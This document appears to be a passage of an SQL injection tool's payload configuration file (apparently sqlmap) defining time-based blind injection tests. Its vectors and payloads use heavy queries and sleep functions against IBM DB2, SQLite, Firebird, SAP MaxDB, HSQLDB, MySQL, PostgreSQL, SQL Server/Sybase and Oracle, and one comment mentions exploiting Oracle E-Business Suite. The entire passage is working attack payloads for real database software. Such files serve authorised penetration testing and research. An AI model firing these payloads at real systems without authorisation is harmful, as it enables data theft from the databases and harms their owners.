    <test>        <title>IBM DB2 OR time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>        <request>            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>IBM DB2</dbms>        </details>    </test>
    <test>        <title>SQLite > 2.0 AND time-based blind (heavy query)</title>        <stype>5</stype>        <level>3</level>        <risk>2</risk>        <clause>1</clause>        <where>1</where>        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>        <request>            <payload>AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SQLite</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>
    <test>        <title>SQLite > 2.0 OR time-based blind (heavy query)</title>        <stype>5</stype>        <level>3</level>        <risk>3</risk>        <clause>1</clause>        <where>1</where>        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>        <request>            <payload>OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SQLite</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>
    <test>        <title>SQLite > 2.0 AND time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1</clause>        <where>1</where>        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>        <request>            <payload>AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SQLite</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>
    <test>        <title>SQLite > 2.0 OR time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>3</risk>        <clause>1</clause>        <where>1</where>        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>        <request>            <payload>OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SQLite</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>
    <test>        <title>Firebird >= 2.0 AND time-based blind (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1</clause>        <where>1</where>        <vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>        <request>            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Firebird</dbms>            <dbms_version>>= 2.0</dbms_version>        </details>    </test>
    <test>        <title>Firebird >= 2.0 OR time-based blind (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>3</risk>        <clause>1</clause>        <where>1</where>        <vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>        <request>            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Firebird</dbms>            <dbms_version>>= 2.0</dbms_version>        </details>    </test>
    <test>        <title>Firebird >= 2.0 AND time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1</clause>        <where>1</where>        <vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>        <request>            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Firebird</dbms>            <dbms_version>>= 2.0</dbms_version>        </details>    </test>
    <test>        <title>Firebird >= 2.0 OR time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>3</risk>        <clause>1</clause>        <where>1</where>        <vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>        <request>            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Firebird</dbms>            <dbms_version>>= 2.0</dbms_version>        </details>    </test>
    <test>        <title>SAP MaxDB AND time-based blind (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>        <request>            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SAP MaxDB</dbms>        </details>    </test>
    <test>        <title>SAP MaxDB OR time-based blind (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>        <request>            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SAP MaxDB</dbms>        </details>    </test>
    <test>        <title>SAP MaxDB AND time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>        <request>            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SAP MaxDB</dbms>        </details>    </test>
    <test>        <title>SAP MaxDB OR time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>        <request>            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SAP MaxDB</dbms>        </details>    </test>
    <test>        <title>HSQLDB >= 1.7.2 AND time-based blind (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>        <request>            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>>= 1.7.2</dbms_version>        </details>    </test>
    <test>        <title>HSQLDB >= 1.7.2 OR time-based blind (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>        <request>            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>>= 1.7.2</dbms_version>        </details>    </test>
    <test>        <title>HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>        <request>            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>>= 1.7.2</dbms_version>        </details>    </test>
    <test>        <title>HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>        <request>            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>>= 1.7.2</dbms_version>        </details>    </test>
    <test>        <title>HSQLDB > 2.0 AND time-based blind (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>        <request>            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>
    <test>        <title>HSQLDB > 2.0 OR time-based blind (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>        <request>            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>
    <test>        <title>HSQLDB > 2.0 AND time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>        <request>            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>
    <test>        <title>HSQLDB > 2.0 OR time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>        <request>            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>    <!-- TODO: if possible, add payload for Microsoft Access -->    <!-- End of time-based boolean tests -->
    <!-- Time-based boolean tests - Numerous clauses -->    <!-- This payload does not work with SLEEP() -->    <test>        <title>MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)</title>        <stype>5</stype>        <level>3</level>        <risk>2</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>        <request>            <payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>
    <test>        <title>MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>        <request>            <payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)</payload>            <comment>#</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>    <!-- End of time-based boolean tests - Numerous clauses -->
    <!-- Time-based boolean tests - Parameter replace -->    <test>        <title>MySQL >= 5.0.12 time-based blind - Parameter replace</title>        <stype>5</stype>        <level>2</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>        <request>            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>
    <test>        <title>MySQL >= 5.0.12 time-based blind - Parameter replace (SELECT)</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>        <request>            <payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>
    <test>        <title>MySQL &lt;= 5.0.11 time-based blind - Parameter replace (heavy queries)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>        <request>            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>&lt;= 5.0.11</dbms_version>        </details>    </test>
    <test>        <title>MySQL time-based blind - Parameter replace (bool)</title>        <stype>5</stype>        <level>4</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>([INFERENCE] AND SLEEP([SLEEPTIME]))</vector>        <request>            <payload>([RANDNUM]=[RANDNUM] AND SLEEP([SLEEPTIME]))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL time-based blind - Parameter replace (ELT)</title>        <stype>5</stype>        <level>5</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>        <request>            <payload>ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL time-based blind - Parameter replace (MAKE_SET)</title>        <stype>5</stype>        <level>5</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>        <request>            <payload>MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>PostgreSQL > 8.1 time-based blind - Parameter replace</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>        <request>            <payload>(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>            <dbms_version>> 8.1</dbms_version>        </details>    </test>
    <test>        <title>PostgreSQL time-based blind - Parameter replace (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>        <request>            <payload>(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>        </details>    </test>
    <test>        <title>Microsoft SQL Server/Sybase time-based blind - Parameter replace</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>1,3</clause>        <where>3</where>        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>        <request>            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Microsoft SQL Server</dbms>            <dbms>Sybase</dbms>            <os>Windows</os>        </details>    </test>
    <test>        <title>Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1,3</clause>        <where>3</where>        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</vector>        <request>            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Microsoft SQL Server</dbms>            <dbms>Sybase</dbms>            <os>Windows</os>        </details>    </test>
    <!-- Without parentheses because it never works with them, useful to exploit SQL injection in Oracle E-Business Suite Financials -->    <test>        <title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>1,3</clause>        <where>3</where>        <vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>        <request>            <payload>BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>1,3</clause>        <where>3</where>        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>        <request>            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle time-based blind - Parameter replace (heavy queries)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1,3</clause>        <where>3</where>        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>        <request>            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>SQLite > 2.0 time-based blind - Parameter replace (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))</vector>        <request>            <payload>(SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SQLite</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>
    <test>        <title>Firebird time-based blind - Parameter replace (heavy query)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>        <request>            <payload>(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Firebird</dbms>            <dbms_version>>= 2.0</dbms_version>        </details>    </test>
    <test>        <title>SAP MaxDB time-based blind - Parameter replace (heavy query)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,3</clause>        <where>3</where>        <vector>(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>        <request>            <payload>(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SAP MaxDB</dbms>        </details>    </test>
    <test>        <title>IBM DB2 time-based blind - Parameter replace (heavy query)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>        <request>            <payload>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>IBM DB2</dbms>        </details>    </test>        <!-- Untested -->    <test>        <title>HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>        <request>            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>>= 1.7.2</dbms_version>        </details>    </test>
